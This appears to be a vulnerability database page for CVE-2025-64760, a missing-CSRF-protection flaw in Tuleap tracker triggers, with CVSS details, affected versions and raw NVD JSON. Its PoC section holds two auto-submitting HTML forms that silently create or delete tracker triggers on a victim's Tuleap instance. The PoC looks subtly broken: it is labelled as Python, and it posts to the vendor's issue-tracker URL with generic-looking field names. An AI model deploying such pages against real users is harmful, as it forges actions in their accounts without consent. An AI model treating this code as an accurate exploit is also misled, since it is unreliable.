Security Vulnerability Report
中文
CVE-2025-64760 CVSS 4.6 MEDIUM

CVE-2025-64760

Published: 2025-12-08 23:15:49
Last Modified: 2025-12-10 21:01:57
Source: [email protected]

Description

Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE
Tuleap Community Edition < 17.0.99.1763126988
Tuleap Enterprise Edition < 17.0-3
Tuleap Enterprise Edition < 16.13-8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64760 - Create Tracker Trigger --> <!DOCTYPE html> <html> <head> <title>Tracker Trigger Creation</title> </head> <body> <h1>Loading...</h1> <form id="csrfForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST" enctype="multipart/form-data"> <input type="hidden" name="func" value="admin-formCreateTrigger" /> <input type="hidden" name="tracker_id" value="123" /> <input type="hidden" name="trigger_name" value="malicious_trigger" /> <input type="hidden" name="trigger_condition" value="on_update" /> <input type="hidden" name="trigger_action" value="send_email" /> </form> <script> // Auto-submit the form without user interaction document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- CSRF PoC for CVE-2025-64760 - Delete Tracker Trigger --> <!DOCTYPE html> <html> <head> <title>Tracker Trigger Deletion</title> </head> <body> <form id="deleteForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST"> <input type="hidden" name="func" value="admin-deleteTrigger" /> <input type="hidden" name="tracker_id" value="123" /> <input type="hidden" name="trigger_id" value="456" /> <input type="hidden" name="confirm" value="1" /> </form> <script> document.getElementById('deleteForm').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64760", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:48.510", "lastModified": "2025-12-10T21:01:57.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.13-8", "matchCriteriaId": "07CF66A2-4F1D-40FC-A697-A2435DA23B49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1763126988", "matchCriteriaId": "1EFA1067-6717-4904-9DCB-FD8FE056BE2D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-3", "matchCriteriaId": "08BC8EA2-3661-4BD1-AA60-5956C396ACC9"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-f2xv-x3g6-4j9p", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45618", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.